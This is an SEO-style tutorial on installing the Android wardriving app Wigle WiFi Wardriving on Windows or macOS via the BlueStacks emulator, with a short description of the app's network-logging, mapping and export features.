This is the tutorial to download Wigle WiFi Wardriving for PC. You can install Wigle WiFi Wardriving for PC on Windows 10/8/7 and macOS. Let me tell you a little about this app before you download it.

This is an open-source application built to observe a network. You can keep track of positioning. This app will let you display a user from the largest queryable database of wireless networks. The main purpose of this application is security analysis and site survey. You can collect networks for your own personal research. These can be uploaded to Wigle’s page where you can compete with others. As of now, Wigle has over 350m networks in its database. This app will show you where your network stands among those 350m networks.

Wigle WiFi Wardriving for PC

Wigle displays the locations of the WiFi networks as it uses GPS to locate them. All the observations are logged into the database of the WiFi Wigle Wardriving. The Wigle leaderboard will give you an idea about how good your connection is. The results can be exported into the CSV files. You can export into KML files for the Google Maps & Earth apps. There is a Rankings tab in the application which shows you the leaderboards right inside the application. Using the search feature of the application, you can search through the local database of the application. All of your uploaded stats are maintained the uploads tab of the app. 

The map shows you all the WiFi connections that are logged into the Wigle WiFi Wardriving app. Remember it will display the users who are using this app. If there are no users using it in your area, the map will show 0 connections and users. In such a case, you can try switching locations on the map.

Wigle WiFi Wardriving is built for Android phones. It’s a free application available in the Google Play Store. If you want to run it on your computer, you can do so with the help of this guide. I am going to show you the steps to download Wigle WiFi Wardriving for PC. Take a look at the requirements below and then follow the steps coming up next.

Requirements

  • Laptop or Desktop PC.
  • Windows 10/8/7 or macOS.
  • WiFi Connection.
  • Android Emulator i.e. BlueStacks.
  • This tutorial.

Download Wigle WiFi Wardriving for PC

  1. Open the Emulator on your computer first of all.
  2. Sign in to the Emulator using existing/new Google Account.
  3. Now open the Play Store inside the Emulator.
  4. Using the search bar, find the Wigle WiFi Wardriving.
  5. As you find the app, install it.
  6. Launch the Wigle WiFi Wardriving app and let it scan the networks.
  7. Start using the application according to your own liking now.
Wigle WiFi Wardriving for PC

Final Words

It’s all done. You have the Wigle WiFi Wardriving for PC up and running. In case you find anything difficult, reach out to us using the comment section below. You can also use the contact us page on our site. Our experts will get back to you as soon as possible.

Tags: DownloadFreePCwigle wifi wardrivingWigle WiFi Wardriving for PC

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Для этой операции требуется съемный носитель например usb устройство флэш памяти windows 10
  • Какие папки нельзя создать в windows
  • Обычная загрузка windows как запустить
  • Windows server dhcp синхронизация
  • Активатор windows 7 домашняя расширенная 64 bit активатор